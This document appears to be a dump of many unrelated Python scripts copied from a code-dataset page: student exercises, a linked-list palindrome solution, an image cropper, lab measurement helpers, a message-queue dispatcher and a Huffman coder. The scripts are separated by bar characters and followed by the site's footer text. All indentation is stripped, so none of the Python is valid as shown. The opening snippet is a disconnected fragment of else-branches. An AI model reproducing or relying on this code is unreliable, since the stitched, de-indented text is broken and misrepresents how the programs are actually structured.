return len(friends)
#application will terminate
# The no of friends the spy has will be returned.
# The no of friends the spy has will be returned.
else:
print (colored("Sorry but age cannot be blank!", 'red'))
# The no of friends the spy has will be returned.
else:
print(colored('Please enter valid salutation!', 'red'))
else:
print(colored('Salutation cannot be blank!','red'))
else:
print(colored('Name cannot be blank!','red'))
return len(friends) |
test_string=input()
m=[ ]
m=test_string.split( )
count=0
for word in m:
count=count+1
print(count);
|
import readline
from sdt.shapes.shape_factory import ShapeFactory
ShapeFactory.initialize()
def main():
running = True
print('Hello, I am a smart robot who will help you check the type of a triangle')
while running:
try:
a = input('Please inform a number to value A:')
b = input('Please inform a number to value B:')
c = input('Please inform a number to value C:')
triangle_type = ShapeFactory.drawTriangle(int(a),
int(b),
int(c)).getType()
print("### RESULT ### - {}".format(triangle_type))
except Exception:
print("### ERROR ### - please just inform numbers")
except KeyboardInterrupt:
running = False
print('\nBye bye')
if __name__ == "__main__":
main()
|
# -*- encoding:utf-8 -*-
# __author__=='Gan'
# Given a singly linked list, determine if it is a palindrome.
# Follow up:
# Could you do it in O(n) time and O(1) space?
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
# Solution 1: Reversed first half == second half
# phase 1: Reverse the first half while finding middle.
# phase 2: Compare the reversed first half with the second half.
class Solution(object):
def isPalindrome(self, head):
"""
:type head: ListNode
:rtype: bool
"""
hare = tortoise = head
rev = None # The last node is None.
while hare and hare.next:
hare = hare.next.next
rev, rev.next, tortoise = tortoise, rev, tortoise.next
tortoise = tortoise.next if hare else tortoise
while tortoise and tortoise.val == rev.val:
tortoise = tortoise.next
rev = rev.next
return not tortoise
# Solution 1: Reversed first half == second half
# phase 1: Reverse the first half while finding middle.
# phase 2: While comparing the two halves, restore the list to its original state by reversing the first back.
# !! play nice!!!!!
class Solution(object):
def isPalindrome(self, head):
"""
:type head: ListNode
:rtype: bool
"""
hare = head
rev = None # The last node is None.
while hare and hare.next:
hare = hare.next.next
rev, rev.next, head = head, rev, head.next
tail = head.next if hare else head
while rev and tail.val == rev.val:
head, head.next, rev = rev, head, rev.next
tail = tail.next
return not rev
if __name__ == '__main__':
head = ListNode(1)
head.next = ListNode(2)
head.next.next = ListNode(2)
head.next.next.next = ListNode(1)
print(Solution().isPalindrome(head))
# 26 / 26 test cases passed.
# Status: Accepted
# Runtime: 142 ms
# Your runtime beats 54.12 % of python submissions.
|
wt = [1, 2, 3, 3]
W = 6
n = len(wt)
def subsetSum(W, wt, n):
t = [[0 for _ in range(W+1)] for _ in range(n+1)]
for i in range(n+1):
t[i][0] = 1
for i in range(1, n+1):
for j in range(1, W+1):
if wt[i-1] <= j:
t[i][j] = t[i-1][j-wt[i-1]] + t[i-1][j]
else:
t[i][j] = t[i-1][j]
return t[-1][-1]
print(subsetSum(W, wt, n))
|
'''
Draw Star Assignment '''
# Part I
def draw_stars(arr):
for i in arr:
k = 0
str = ''
while k < i:
str += '*'
k += 1
print(str)
x = draw_stars([4, 6, 1, 3, 5, 7, 25])
# Part II
def draw_stars2(arr):
for i in arr:
k = 0
str_l = ''
if isinstance(i, str):
while k < len(i):
str_l += i[0].lower()
k += 1
print(str_l)
elif isinstance(i, int):
while k < i:
str_l += '*'
k += 1
print(str_l)
x = draw_stars2([4, "Tom", 1, "Michael", 5, 7, "Jimmy Smith"])
|
#3n orontoi toonii tsippfriin niilber
too1 = input("too1: ")
too2 = input("too2: ")
niilber = int(too1)+int(too2)
print((niilber//100) + niilber//10%10 + niilber%10) |
import util
import pyutil
def getRanges(count, forHistory = False):
ret = []
minimum = 35
minrequired = 250
i = 3 if forHistory else 1
last = (count % minimum)
end = 0
while ((i * minimum) + minrequired < count):
start = ((i-1) * minimum)
end = ((i) * minimum) + minrequired
ret.append([start, end])
i += 1
start = ((i-1) * minimum)
tend = start + last + minrequired + minimum
if tend <= count:
ret.append([start, tend])
else:
ret[-1][-1] = count
return ret
def standard():
savedir = "foobar"
fname = "filename_"
pyutil.clearDir(savedir, fname)
util.saveProcessedFromYahoo.download = False
stocks = util.getStocks(dev=True)
ranges = getRanges(util.getNumberOfDates())
for vals in ranges:
util.report(stocks, start=vals[0], end=vals[1],
reportname = fname,
reportdir = savedir)
def historical():
where = "history"
# pyutil.clearDir(where)
util.getStocks.totalOverride = True
stocks = util.getStocks()
ranges = getRanges(util.getNumberOfDates(), forHistory = True)
grouping = 0
for i,vals in enumerate(ranges):
if i % 15 == 0:
grouping += 1
if grouping < 6:
continue
util.report(stocks, start=vals[0], end=vals[1],
reportname = "{}_{}_".format(where, grouping),
reportdir = where)
return where
#historical()
|
import numpy as np
arr1 =np.array([[1., -3., 15., -466.],[1.,2.,3.,4.]])
print(arr1*arr1)
print(np.square(arr1))
print(np.inner(arr1,arr1))
print(np.dot(arr1,np.transpose(arr1)))
print(np.sum(arr1*arr1,axis=0))
print(np.diag(np.sum(arr1*arr1,axis=0)))
|
from SignalGenerationPackage.SignalController import SignalController
from SignalGenerationPackage.Sinus.SinusSignal import SinusSignal
from SignalGenerationPackage.Sinus.SinusObserver import SinusObserver
from SignalGenerationPackage.Sinus.SinusAmplitudeCallBackOperator import SinusAmplitudeCallBackOperator
from SignalGenerationPackage.Sinus.SinusTimeFromCallBackOperator import SinusTimeFromCallBackOperator
from SignalGenerationPackage.Sinus.SinusTimeToCallBackOperator import SinusTimeToCallBackOperator
from SignalGenerationPackage.Sinus.SinusPointsNumberCallBackOperator import SinusPointsNumberCallBackOperator
from SignalGenerationPackage.Sinus.SinusPhaseCallBackOperator import SinusPhaseCallBackOperator
from SignalGenerationPackage.Sinus.SinusOmegaCallBackOperator import SinusOmegaCallBackOperator
from SignalGenerationPackage.Sinus.SinusMainWindow import SinusMainWindow
from CallBackOperators.ForwardSendingOperator import ForwardSendingOperator
from SignalGenerationPackage.Sinus.SinusUIParameters import SinusUIParameters
from SignalGenerationPackage.Sinus.AutoFillCallBackOperator import AutoFillCallBackOperator
from SignalGenerationPackage.Sinus.RequestFrequencyCallBackOperator import RequestFrequencyCallBackOperator
class SinusSignalController(SignalController):
def __init__(self):
super().__init__()
# overridden
def init_model(self):
self.model = SinusSignal()
# overridden
def init_observer(self):
self.observer = SinusObserver(self.model, self.main_window.plot)
# overridden
def init_main_window(self):
self.main_window = SinusMainWindow()
# overridden
def init_callback_operators(self):
self.callback_operators = \
[
SinusAmplitudeCallBackOperator(self.model),
SinusTimeFromCallBackOperator(self.model),
SinusTimeToCallBackOperator(self.model),
SinusPointsNumberCallBackOperator(self.model),
SinusPhaseCallBackOperator(self.model),
SinusOmegaCallBackOperator(self.model),
RequestFrequencyCallBackOperator(self.model),
AutoFillCallBackOperator(self.slider_constants, self.param_names, self.sliders, model=None),
]
# overridden
def init_plot_widget(self):
self.plot_widget = self.main_window.user_interface.frame
# overridden
def append_sending_operator(self):
self.callback_operators.append(ForwardSendingOperator(self.main_window, self.plot_widget, DebugMode=True))
# overridden
def init_param_names(self):
self.param_names = [
"Phase", "Omega", "Points Number", "Time From", "Time To", "Amplitude", "Request Frequency"
]
# overridden
def init_slider_constants(self):
self.slider_constants = [
SinusUIParameters.PhaseCalcConstant,
SinusUIParameters.OmegaCalcConstant,
SinusUIParameters.PointsNumberCalcConstant,
SinusUIParameters.TimeFromCalcConstant,
SinusUIParameters.TimeToCalcConstant,
SinusUIParameters.AmplitudeCalcConstant,
SinusUIParameters.RequestFreqCalcConstant
]
def init_sliders(self):
ui = self.main_window.user_interface
self.sliders = [
ui.horizontalSliderPhase,
ui.horizontalSliderOmega,
ui.horizontalSliderPointsNumber,
ui.horizontalSliderTimeFrom,
ui.horizontalSliderTimeTo,
ui.horizontalSliderAmplitude,
ui.horizontalSliderRequestFrequency
] |
import datetime
import pika
from pymongo import MongoClient
from bson import json_util
import json
__author__ = 'sam'
class PersistenceManager(object):
minutes = 15
def __init__(self,mongodb_host='localhost', mongodb_port=27017, mongodb_name='foreman'):
self.client = MongoClient(mongodb_host, mongodb_port)
self.db = self.client[mongodb_name]
def find_storage_to_update(self):
d = datetime.datetime.now() - datetime.timedelta(minutes=self.minutes)
return self.db['storages'].find({"last-updated": {"$lt": d}})
def dispatch_harverster(self,storage_data):
connection = pika.BlockingConnection(pika.ConnectionParameters(
host='localhost')) #TODO
channel = connection.channel()
channel.queue_declare(queue=storage_data['provider'])
channel.basic_publish(exchange='',
routing_key=storage_data['provider'],
body=json.dumps(storage_data, default=json_util.default))
connection.close()
self._log_event('foreman', 'dispatch harvester', storage_data)
def _log_event(self, actor, event_name, data):
event_document = {}
event_document['timestamp'] = datetime.datetime.now()
event_document['actor'] = actor
event_document['event_name'] = event_name
event_document['data'] = data
self.db['events_log'].insert(event_document)
def main():
persistence = PersistenceManager()
persistence._log_event('foreman', 'started', {})
storages = persistence.find_storage_to_update()
persistence._log_event('foreman', 'storage check', {'number_of_storage':storages.count()})
for storage in storages:
persistence.dispatch_harverster(storage)
persistence._log_event('foreman', 'terminated', {})
if __name__ == '__main__':
main()
|
import tests.helper as test_helper
test_helper.amend_path(__file__)
import unittest
import git
class TestGit(unittest.TestCase):
def test_config(self):
import util
_old_run = util.run
def mock_run(*args):
print args
if args == ('git', 'config', '--list'):
return _old_run('echo', 'user.name=foo\nuser.email=foo@example.com')
else:
return _old_run(*args)
util.run = mock_run
config = git.config()
self.assertEqual(config.get('user.name'), 'foo')
self.assertEqual(config.get('user.email'), 'foo@example.com')
util.run = _old_run
|
def numeroDigitos(numero):
if(numero < 10):
return 1
else:
return 1+numeroDigitos(numero/10)
return 1
def invertir(numero):
if(numero < 10):
return numero
else:
return (10**(numeroDigitos(numero)-1))*(numero%10) + invertir(int(numero/10))
def palindromo(numero):
if(numeroDigitos(numero) <= 1):
return "Palindromo"
if(numero%10 == invertir(numero)%10):
return palindromo(int(numero - ((10**(numeroDigitos(numero)-1))*(numero/(10**(numeroDigitos(numero)-1)))))/10)
else:
return "No palindromo"
print ( palindromo(43234) )
print ( palindromo(143234) )
print ( palindromo(1432341) )
|
from serversocket import ServerSocket
class TCPServer:
def __init__(self,
read_callback,
maximum_connections=5,
receive_bytes=2048):
self.server_socket = ServerSocket(
read_callback,
maximum_connections,
receive_bytes
)
self.ip = self.server_socket.ip
self.port = self.server_socket.port
def run(self):
self.server_socket.run()
|
"""ImageCropper module; imported by ImageOperate aggregate class."""
from PIL import Image
import ImageColumnCropOperators
import statistics
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
pd.options.mode.chained_assignment = None
class ImageCropper(object):
"""
Cropping function; removes black image borders and outputs cropped image without Moody's header.
Attributes:
final_rotate: Incoming straightened image object from the ImageRotater class.
cropped_array: Cropped body portion of image as an array not including Moody's header.
page_number_array: Cropped header portion of image as an array.
"""
def __init__(self, rotated_image):
self.final_rotate = rotated_image.final_rotate
self.rotate_crop_data = self.rotate_crop()
self.cropped_array = self.rotate_crop_data[0]
self.page_number_array = self.rotate_crop_data[1]
self.final_cropped_array = self.trim_sides()
def rotate_crop(self):
"""Define crop points and perform cropping."""
crop_pts = []
# Convert rotated image to luminance array
luminance_img = np.asarray((self.final_rotate).convert('L'))
# Loop to identify crop points; examines image vertically, rotates 90°, repeats.
for index in range(0, 2):
# Rotate 90° for second treatment.
if index == 1:
luminance_img = np.rot90(luminance_img, k=3)
# Take column average pixel density.
axis_avgs = list((luminance_img.mean(axis=1)) / 255)
# Convert array to pd DataFrame; take rolling mean of avgs (30px per iteration).
axis_df = pd.DataFrame(axis_avgs, columns=['values'])
rolling_mean = axis_df.rolling(30).mean()
# Crop array to only show edges of image (300 pixels from left & right).
split_val = 300
split1 = rolling_mean.iloc[: split_val]
split2 = rolling_mean.iloc[-(split_val) :]
split_list = [split1, split2]
# Take the median dimension value of range of values with 'whiteness' greater than .85.
crop_pts_iteration = 0
white_score = .85
while crop_pts_iteration < 2:
for split_range in split_list:
white_points = list(split_range.index[split_range['values'] > white_score])
if len(white_points) > 0:
if len(white_points) < 50:
if max(white_points) < (int(len(rolling_mean)) / 2):
white_range = int(min(white_points))
elif max(white_points) > (int(len(rolling_mean)) / 2):
white_range = int(max(white_points))
else:
white_range = int(statistics.median(white_points))
crop_pts.append(white_range)
crop_pts_iteration += 1
white_score = .85
split_val = 300
if crop_pts_iteration == 2:
break
else:
if split_range['values'].mean() < .5 and split_val < 600:
split_val += 100
else:
white_score -= .02
split1 = rolling_mean.iloc[: split_val]
split2 = rolling_mean.iloc[-(split_val) :]
split_list = [split1, split2]
if crop_pts_iteration in [0, 2]:
break
elif crop_pts_iteration == 1:
split_list = [split2, split1]
break
# Rotate image back to upright; crop image on 'white_range' values.
luminance_img = np.rot90(luminance_img, k=1)
cropped_img = luminance_img[crop_pts[0] : crop_pts[1],
crop_pts[2] + 1250 : crop_pts[3] -1250]
cropped_df = pd.DataFrame(list((cropped_img.mean(axis=1)) / 255), columns=['values'])
# Slice top 1000 pixels to identify page header.
cut_value = 1000
bar_value = .1
header_crop = 0
header_iteration = 0
while header_crop == 0:
header_slice = cropped_df[:cut_value]
if len(list(header_slice.index[header_slice['values'] < bar_value])) > 0:
header_crop = max(list(header_slice.index[header_slice['values'] < bar_value]))
crop_pts[0] = crop_pts[0] + header_crop
break
else:
bar_value += .02
header_iteration += 1
if header_iteration > 5:
break
# Look for eronious bottom-of-page elements to crop out as well.
footer_crop = 0
footer_iteration = 0
while footer_crop == 0:
footer_slice = cropped_df[-cut_value:]
if len(list(footer_slice.index[footer_slice['values'] < bar_value])) > 0:
footer_crop = min(list(footer_slice.index[footer_slice['values'] < bar_value]))
crop_pts[1] = crop_pts[0] - header_crop + footer_crop
break
else:
bar_value += .02
footer_iteration += 1
if footer_iteration > 5:
break
# Crop final image to remove extra elements removed.
cropped_array = luminance_img[crop_pts[0] : crop_pts[1],
crop_pts[2] : crop_pts[3]]
page_number_array = luminance_img[0 : crop_pts[0],
crop_pts[2] : crop_pts[3]]
# Return final cropped image and page number array for further processing.
return (cropped_array, page_number_array)
def trim_sides(self):
""""""
def build_array(array):
""""""
rolling_mean_vertical_array = ImageColumnCropOperators.convert_rolling_mean(array, 0, 10, 0)
split_value = int(len(rolling_mean_vertical_array) / 2)
vertical_array_split1 = rolling_mean_vertical_array.iloc[:split_value]
vertical_array_split2 = rolling_mean_vertical_array.iloc[-split_value:]
split_list = [vertical_array_split1, vertical_array_split2]
iteration = 1
array_var_list = []
for array in split_list:
# plt.plot(array)
# plt.show()
if iteration == 2:
array = array.iloc[::-1]
array_shift = pd.DataFrame(array['values'].shift(-1))
array_shift.columns = ['values']
array['values2'] = array_shift['values']
array['distance'] = array['values2'] - array['values']
array['distance_binary'] = [0 if value >= 0 else 1 for value in array['distance']]
array_shift2 = pd.DataFrame(array['distance_binary'].shift(-1))
array_shift2.columns = ['distance']
array['distance_binary_shift'] = array_shift2['distance']
array['index'] = array.index
array = array[['index', 'distance', 'distance_binary', 'distance_binary_shift']]
array['distance'].fillna(0, inplace=True)
array['distance_binary'].fillna(0, inplace=True)
array['distance_binary_shift'].fillna(0, inplace=True)
array['distance_binary'] = array['distance_binary'].astype(int)
array['distance_binary_shift'] = array['distance_binary_shift'].astype(int)
array = array.values.tolist()
array_var_list.append(array)
iteration += 1
return (rolling_mean_vertical_array, array_var_list)
def descending_continuity(input_data, run_type):
""""""
rolling_mean_vertical_array = input_data[0]
array_var_list = input_data[1]
iteration = 1
crop_points_inner = []
for array in array_var_list:
continuity = 0
break_point = 0
if run_type == 'original':
for i, distance_list in enumerate(array):
if distance_list[2] == 1 and distance_list[3] == 1:
continuity += -(distance_list[1])
if continuity >= .025:
break
else:
continuity = 0
if run_type == 'second_pass':
for i, distance_list in enumerate(array):
if distance_list[2] == 1 and distance_list[3] == 1:
continuity += -(distance_list[1])
if continuity >= .07:
break
else:
continuity = 0
if iteration == 1:
if int(distance_list[0]) < 35:
crop_points_inner.append(0)
else:
crop_points_inner.append(int(distance_list[0]) - 35)
elif iteration == 2:
if len(rolling_mean_vertical_array) - int(distance_list[0]) < 35:
crop_points_inner.append(len(rolling_mean_vertical_array))
else:
crop_points_inner.append(int(distance_list[0]) + 35)
iteration += 1
return crop_points_inner
crop_points = []
array_list = [self.cropped_array, np.rot90(self.cropped_array, k=1)]
for array in array_list:
array_data = build_array(array)
array_crop_pts = descending_continuity(array_data, 'original')
for point in array_crop_pts:
crop_points.append(point)
print(crop_points)
trimmed_image = self.cropped_array[crop_points[2] : crop_points[3], crop_points[0] : crop_points[1]]
# Account for incomplete trimming on darker images.
array_data = build_array(trimmed_image)
array_crop_pts = descending_continuity(array_data, 'second_pass')
if array_crop_pts[0] > 7:
if array_crop_pts[0] > 100:
array_crop_pts[0] = 100
crop_points[0] = crop_points[0] + array_crop_pts[0]
elif abs(array_crop_pts[1] - crop_points[1]) > 7 and abs(array_crop_pts[1] - crop_points[1]) < 100:
difference = abs(array_crop_pts[1] - crop_points[1])
if difference > 25:
difference = 25
crop_points[1] = crop_points[1] - difference
print(crop_points)
trimmed_image_out = self.cropped_array[crop_points[2] : crop_points[3], crop_points[0] : crop_points[1]]
return trimmed_image_out
|
# Name: Taidgh Murray
# Student ID: 15315901
# File: sentence.py
############################################################################
sen=input("Please type a sentence here: ")
amount=len(sen.split())
print("There are" ,amount, "words in this sentence")
newsen=sen.replace(" ", "")
letters=len(newsen)
avg=letters/amount
print("The average word lenght is", avg)
|
# Generated by Django 2.1.2 on 2019-07-28 16:03
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('career_test', '0006_auto_20190729_0002'),
]
operations = [
migrations.AlterField(
model_name='mbtianwsertype',
name='choice',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='career_test.Choice'),
),
]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 20 16:56:45 2019
@author: measPC
"""
import numpy as np
import matplotlib.pyplot as plt
import time, datetime, math
import ctypes, os, csv, sys
from scipy.signal import savgol_filter
from IPython.display import clear_output
from progressbar import *
from tqdm import tqdm, tqdm_notebook
import qcodes as qc
from qcodes import Station
from qcodes.instrument.base import Instrument
from qcodes.dataset.experiment_container import (Experiment,
load_last_experiment,
new_experiment)
from qcodes.dataset.database import initialise_database
from qcodes.dataset.measurements import Measurement
from qcodes.dataset.plotting import plot_by_id, get_data_by_id
from qcodes.dataset.data_export import get_shaped_data_by_runid
def set_state ( **kwargs ):
"""
Setting of certain values to the Instrument parameters
args:
**kwargs: dict of InstNicknames and values to be set
"""
for var, val in kwargs.items():
eval(var).set(val)
def vset_state ( **kwargs):
"""
Verbose setting of certain values to the Instrument parameters
args:
**kwargs: dict of InstNicknames and values to be set
"""
for var, val in kwargs.items():
eval(var).set(val)
tqdm.write('{} is set to {}{}'.format(var.label, eng( val ), device.unit) )
def set_meas(dep, fast_indep, slow_indep = None, setup = setup, cleanup = cleanup):
"""
Regestration of the parameters and setting up before/after run procedure
args:
dep: InstParameter to be regestered as dependent var
fast_indep: InstParameter to be regestered as fast independent var
slow_indep: InstParameter to be regestered as second independent var (if any)
setup: Procedure to be done before run
cleanup: Procedure to be done after run
returns:
meas: Measurement() object
"""
meas = Measurement()
meas.register_parameter( fast_indep ) # register the fast independent parameter
if slow_indep is not None:
meas.register_parameter( slow_indep ) # register the first independent parameter
meas.register_parameter( dep , setpoints = ( slow_indep, fast_indep ) )
else:
meas.register_parameter( dep, setpoints = ( fast_indep , ))
meas.add_before_run(setup, args=())
meas.add_after_run(cleanup, args=())
meas.write_period = 2
return meas
def probe_scan( datasaver, probe_list, **kwargs):
"""
DEPRECATE, use more general version S21_scan
Do scan through probe_list and save result to the datasaver
args:
datasaver: Datasaver to save results of the measurment
probe_list: Frequency list to scan through
**kwargs: dict of the InstParameters and its values to add to atasaver (have to be defined in set_meas)
"""
probe_min = np.min (probe_list)
probe_max = np.max (probe_list)
pbar = tqdm_notebook(probe_list, desc = '{} to {} GHz scan'.format( probe_min/1e9,probe_max/1e9 ),
leave = False)
with iqmixer.ats.get_prepared(N_pts = 8192, N_avg = 4000):
for f in pbar:
iqmixer.frequency.set( f )
pbar.set_description('{:1.4f}GHz'.format(f/1e9))
iqmixer.ats.start_capturing()
S21 = iqmixer.S21.get()
if not kwargs:
datasaver.add_result(( iqmixer.frequency, f),
( iqmixer.S21_ampl, S21.ampl))
else:
for var, val in kwargs.items():
device = var_list[var]
datasaver.add_result(( device, val),
( iqmixer.frequency, f),
( iqmixer.S21_ampl, S21.ampl))
def S21_scan(datasaver, y_var, x_var, x_list, **kwargs):
"""
Do scan through list of values(x_list) of any InstrParameter(x_var), meas any (y_var) adta and save to datasaver
args:
datasaver: Datasaver to save results of the measurment
y_var: InstParameter to be measured (tested only on S21.ampl and S21/phase)
x_var: InstParameter to be scan (indep var)
x_list: list of values for be scan through
**kwargs: dict of the InstParameters and its values to add to datasaver (have to be defined in set_meas)
"""
ydevice = y_var
xdevice = x_var
xunit = xdevice.unit
xlabel = xdevice.label
x_min = np.min (x_list)
x_max = np.max (x_list)
tx_list = tqdm_notebook(x_list, desc = '{} to {} {} scan'.format( eng(x_min), eng(x_max ), xunit),
leave = False)
with ats.syncing():
ats.external_trigger_range('ETR_1V')
ats.aux_io_mode("AUX_IN_TRIGGER_ENABLE")
ats.aux_io_mode("AUX_OUT_TRIGGER")
#ats.aux_io_param("TRIG_SLOPE_NEGATIVE")
with iqmixer.ats.get_prepared(N_pts = 8192, N_avg = 4000):
for x in tx_list:
xdevice.set( x )
tx_list.set_description('{} @ {}{}'.format( xlabel, eng(x), xunit ))
iqmixer.ats.start_capturing()
S21 = ydevice.get()
res = [ ( xdevice, x), ( ydevice, S21 ) ]
for var, val in kwargs.items():
res = [( eval(var), val)] + res
datasaver.add_result(*res)
def pump_sweep(y_var,fpump_list, Nsw):
"""
Do pump sweep with averaging and random delay
args:
y_var: InstParameter to be measured (tested only on S21.ampl and S21.phase)
fpump_list: list of pump freq values for be scan through
Nsw: number of sweeps for avging
result:
list of avged values (standart deviation) of Y_var with the length of fpump_list
"""
rnd = np.random.random
buf = np.zeros(len(fpump_list))
ydevice = y_var
with iqmixer.ats.get_prepared(N_pts = 8192, N_avg = 400):
tNsw = tqdm_notebook(range(Nsw), desc = 'pump scan', leave = False)
tNsw.set_description('pump scan @ {}GHz'.format( eng(f_target) ))
for j in tNsw:
time.sleep(rnd()*0.5 + .100)
for i,fpump in enumerate(fpump_list):
pump.frequency.set( fpump )
#pump.frequency.get()
time.sleep(0.003)
iqmixer.ats.start_capturing()
S21 = ydevice.get()
buf[i] += S21
result = buf / Nsw
result = (result - np.mean(result))**2
return result
def pump_autosweep(y_var,fpump_list, Nsw, dt ):
"""
Do pump sweep with averaging and random delay
args:
y_var: InstParameter to be measured (tested only on S21.ampl and S21.phase)
fpump_list: list of pump freq values for be scan through
Nsw: number of sweeps for avging
result:
list of avged values (standart deviation) of Y_var with the length of fpump_list
"""
rnd = np.random.random
buf = np.zeros(len(fpump_list))
ydevice = y_var
pump_min = np.min(fpump_list)
pump_max = np.max(fpump_list)
Npump = len(fpump_list)
command_list=[ "*RST\n",
"*CLS\n",
"FREQ:MODE LIST\n",
"LIST:TYPE STEP\n",
"FREQ:STAR {} GHz\n".format((pump_min)/1e9),
"FREQ:STOP {} GHz\n".format((pump_max)/1e9),
"SWE:POIN {}\n".format(Npump),
#"SWE:POIN 11\n",
"SWE:DWEL {} S\n".format(dt),
"POW:AMPL 5 dBm\n",
"OUTP:STAT ON\n"]#, #Turn source RF state on
with ats.syncing():
ats.external_trigger_range('ETR_1V')
ats.aux_io_mode("AUX_IN_TRIGGER_ENABLE")
#ats.aux_io_mode("AUX_OUT_TRIGGER")
ats.aux_io_param("TRIG_SLOPE_POSITIVE")
with iqmixer.ats.get_prepared(N_pts = 8192, N_avg = 400):
tNsw = tqdm_notebook(range(Nsw), desc = 'pump scan', leave = False)
tNsw.set_description('pump scan @ {}GHz'.format( eng(f_target) ))
#iqmixer.ats.start_capturing()
for j in tNsw:
time.sleep(rnd()*0.5 + .100)
for command in command_list:
pump.write(command)
elapsed = np.zeros(Npump)
for i,fpump in enumerate(fpump_list):
#pump.frequency.set( fpump )
#pump.frequency.get()
#time.sleep(0.003)
iqmixer.ats.start_capturing()
if i == 0:
pump.write("TRIG:SOUR IMM")
pump.write("INIT")
#pump.write("INIT:CONT ON\n")
start = time.time()
S21 = ydevice.get()
elapsed[i] = time.time() - start
buf[i] += S21
tqdm.write('{}- {}'.format(j, np.mean(elapsed[1:]) ) )
result = buf / Nsw
result = (result - np.mean(result))**2
return result
def scan_find_steep(datasaver_probe, offset, probe_list, **kwargs):
"""
Do probe scan and find a point on the slope _offset_ away from the S21 minimum
args:
datasaver_probe: Datasaver to save probe scan
offset: position of the point on the slope , 0 for minS21, 1 for max S21
probe_list: list of probe freq for be scan through
**kwargs: dict of the InstParameters and its values to add to datasaver_probe (have to be defined in set_meas)
"""
Nprobe = len(probe_list)
S21_scan(datasaver_probe, S21_ampl, fprobe, probe_list, **kwargs)
runid = datasaver_probe.run_id
S21_full = get_data_by_id(runid)[0][1]['data']
S21_raw = S21_full[-Nprobe:]
freq_raw = probe_list
window = int( Nprobe/10 )
try:
S21_filered = savgol_filter(S21_raw, window, 2)
except ValueError:
S21_filered = savgol_filter(S21_raw, window+1, 2)
ind_min, ind_max, f_min, f_max, S21_min, S21_max = xy_maxmin(freq_raw, S21_filered)
S21_target = S21_min + (S21_max - S21_min)*offset
if ind_min < ind_max:
min_cut = ind_min
max_cut = ind_max
else:
min_cut = ind_max
max_cut = ind_min
freq_cut = freq_raw[min_cut: max_cut]
S21_cut = S21_filered[min_cut: max_cut]
f_target = xy_maxmin(freq_cut, np.abs(S21_cut - S21_target) )[2]
return f_target, S21_target
|
"""
Huffman Coding
By: Gunvir Ranu
This is a simple implementation of Huffman Coding.
It's kinda efficient for Python, but is still slow.
Can compress a 5 MB file in about 3 seconds.
Decompression takes much longer, about 9 seconds for the same file.
It reads text from a text file called `text.txt`.
Then calls various functions to generate the compressed text.
Can then use the compressed text and generated binary tree to decompress the data
The only functions calls needed from main are `huffman_compress` and `huffman_decompress`.
Will document or explain code if wanted.
"""
from collections import Counter
CHAR_LEN = 7
def get_freqs(text):
return Counter(text)
def sort_freqs(freqs):
letters = freqs.keys()
sorted_freqs = [(freqs[let], let) for let in letters]
sorted_freqs.sort()
return sorted_freqs
def get_tree(nodes):
while len(nodes) > 1:
least_two = tuple(nodes[:2])
the_rest = nodes[2:]
comb_weight = least_two[0][0] + least_two[1][0]
nodes = the_rest + [(comb_weight, least_two)]
nodes.sort(key=lambda tup: tup[0])
return nodes[0]
def cut_tree(tree):
if isinstance(tree[1], str):
return tree[1]
else:
return (cut_tree(tree[1][0]),) + (cut_tree(tree[1][1]),)
def get_codes(tree, upper_code=""):
codes = {}
if isinstance(tree, str):
codes[tree] = upper_code
else:
codes.update(get_codes(tree[0], upper_code + '0'))
codes.update(get_codes(tree[1], upper_code + '1'))
return codes
def encode_bits(text, codes):
result = [codes[letter] for letter in text]
result = list(''.join(result))
return result
def bits_to_text(bits):
result = [''.join(bits[i:i+CHAR_LEN]) for i in range(0, len(bits), CHAR_LEN)]
last_len = len(result[-1])
result = [chr(int(byte, 2)) for byte in result]
# Marginally faster
# result = [chr(int(''.join(bits[i:i+CHAR_LEN]), 2)) for i in range(0, len(bits), CHAR_LEN)]
result.append(str(last_len))
result = ''.join(result)
return result
def text_to_bits(text):
text = list(text)
last_len = int(text.pop())
last_byte = text.pop()
bits = []
for byte in text:
bits.append(bin(ord(byte))[2:].zfill(CHAR_LEN))
bits.append(bin(ord(last_byte))[2:].zfill(CHAR_LEN)[-last_len:])
bits = list(''.join(bits))
return bits
def decode_bits(bits, tree):
decompressed = ''
node = tree
for i in bits:
node = node[int(i)]
if type(node) is str:
decompressed += node
node = tree
return decompressed
def huffman_decompress(text, tree):
print("Converting to bits")
bits = text_to_bits(text)
print("Decoding bits")
decompressed = decode_bits(bits, tree)
return decompressed
def huffman_compress(text):
print("Getting text frequencies...")
freqs = get_freqs(text)
print("Sorting frequencies...")
nodes = sort_freqs(freqs)
print("Generating tree...")
full_tree = get_tree(nodes)
print("Cutting tree...")
trimmed_tree = cut_tree(full_tree)
print("Calculating codes...")
codes = get_codes(trimmed_tree)
print("Encoding bits...")
bits = encode_bits(text, codes)
print("Converting bits to text...")
compressed = bits_to_text(bits)
return compressed, trimmed_tree
if __name__ == '__main__':
with open('text.txt', 'rt') as text_file:
text = text_file.read()
print("Starting compression...")
compressed, letter_tree = huffman_compress(text)
print("Finished!")
# print()
# print("Starting decompression")
# decompressed = huffman_decompress(compressed, letter_tree)
# print('Finished')
print()
print(len(text), 'bytes ->', len(compressed), 'bytes')
print("Compression Percentage: " + str(int(len(compressed) / len(text) * 100)) + "%")
print()
with open('compressed.txt', 'wt') as compressed_file:
compressed_file.write(str(compressed))
# with open('decompressed.txt', 'wt') as decompressed_file:
# decompressed_file.write(decompressed)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.